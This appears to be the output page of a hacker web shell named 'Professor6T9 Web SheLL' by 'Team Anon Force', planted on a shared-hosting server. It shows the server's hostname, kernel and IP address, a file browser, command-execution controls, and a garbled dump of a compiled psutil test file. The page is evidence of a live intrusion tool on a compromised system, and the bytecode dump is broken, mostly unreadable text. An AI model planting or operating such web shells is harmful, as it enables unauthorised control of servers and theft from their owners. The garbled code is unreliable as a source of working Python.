GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
proc
/
thread-self
/
root
/
opt
/
alt
/
python37
/
lib64
/
python3.7
/
site-packages
/
psutil
/
tests
/
__pycache__
[ HOME ]
Exec
Submit
File Name : test_memleaks.cpython-37.pyc
B �=�_�9 � @ s d Z ddlmZ ddlZddlZddlZddlZddlmZ ddlmZ ddlm Z ddlm Z ddlmZ dd lmZ dd l mZ ddl mZ ddlmZ dd lmZ ddlmZ ddlmZ ddlmZ ddlmZ ddlmZ ddlmZ ddlmZ ddlmZ ddlmZ ddlmZ ddlmZ ddlmZ ddlmZ ddlm Z ddlm!Z! ddlm"Z" ddlm#Z# ddlm$Z$ dd lm%Z% ej&j'Z'e�(� Z)d!Z*d"d#� Z+G d$d%� d%e$�Z,G d&d'� d'e,�Z-e%�.e d(�G d)d*� d*e$��Z/G d+d,� d,e$�Z0e1d-k�rdd.l2m3Z3 e3e4� dS )/a� Tests for detecting function memory leaks (typically the ones implemented in C). It does so by calling a function many times and checking whether process memory usage keeps increasing between calls or over time. Note that this may produce false positives (especially on Windows for some reason). PyPy appears to be completely unstable for this framework, probably because of how its JIT handles memory, so tests are skipped. � )�print_functionN)�LINUX)�MACOS)�OPENBSD)�POSIX)�SUNOS)�WINDOWS)�ProcessLookupError)�super)�create_sockets)� get_testfn)�HAS_CPU_AFFINITY)�HAS_CPU_FREQ)�HAS_ENVIRON)� HAS_IONICE)�HAS_MEMORY_MAPS)�HAS_NET_IO_COUNTERS)�HAS_PROC_CPU_NUM)�HAS_PROC_IO_COUNTERS)� HAS_RLIMIT)�HAS_SENSORS_BATTERY)�HAS_SENSORS_FANS)�HAS_SENSORS_TEMPERATURES)�process_namespace)�skip_on_access_denied)�spawn_testproc)�system_namespace)� terminate)�TestMemoryLeak)�unittest� c C s dd� } | S )zsDecorator for those Linux functions which are implemented in pure Python, and which we want to run faster. c s t �� �� fdd��}|S )Nc sF t r2| jj}zt| j_� | f|�|�S || j_X n� | f|�|�S d S )N)r � __class__�times� FEW_TIMES)�self�args�kwargs�before)�fun� �M/opt/alt/python37/lib64/python3.7/site-packages/psutil/tests/test_memleaks.py�wrapperA s z5fewtimes_if_linux.<locals>.decorator.<locals>.wrapper)� functools�wraps)r( r+ r) )r( r* � decorator@ s z$fewtimes_if_linux.<locals>.decoratorr) )r. r) r) r* �fewtimes_if_linux<